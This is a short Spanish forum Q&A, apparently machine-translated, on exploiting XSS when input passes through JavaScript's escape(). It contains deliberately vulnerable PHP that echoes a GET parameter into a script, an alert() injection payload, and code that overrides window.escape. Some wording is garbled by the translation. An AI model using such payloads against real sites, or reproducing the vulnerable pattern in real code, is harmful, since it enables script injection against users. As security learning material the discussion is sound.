¿Hay alguna manera de evitar la función de escape en javascript para explotar una vulnerabilidad XSS?
Claro, digamos que tiene el siguiente código PHP que es vulnerable a XSS:
<?php
print "<script>var t=escape('".$_GET['t']."')</script>";
?>
Puede suministrar este archivo con el siguiente Prof. de concepto de XSS para obtener una ventana de alerta:
enlace '); alert (' xss '); //
Si necesita anular la función de escape por cualquier motivo (¿asumo que ya existe un XSS?) Estoy bastante seguro de que puede anularlo creando una función anónima similar a esta:
(function() {
window.escape = function() {
return true;
};
})();
Sin embargo, si está buscando un filtro XSS sin pasar por alto, le recomiendo que lea y pruebe esta hoja de trucos XSS: enlace
Lea otras preguntas en las etiquetas xss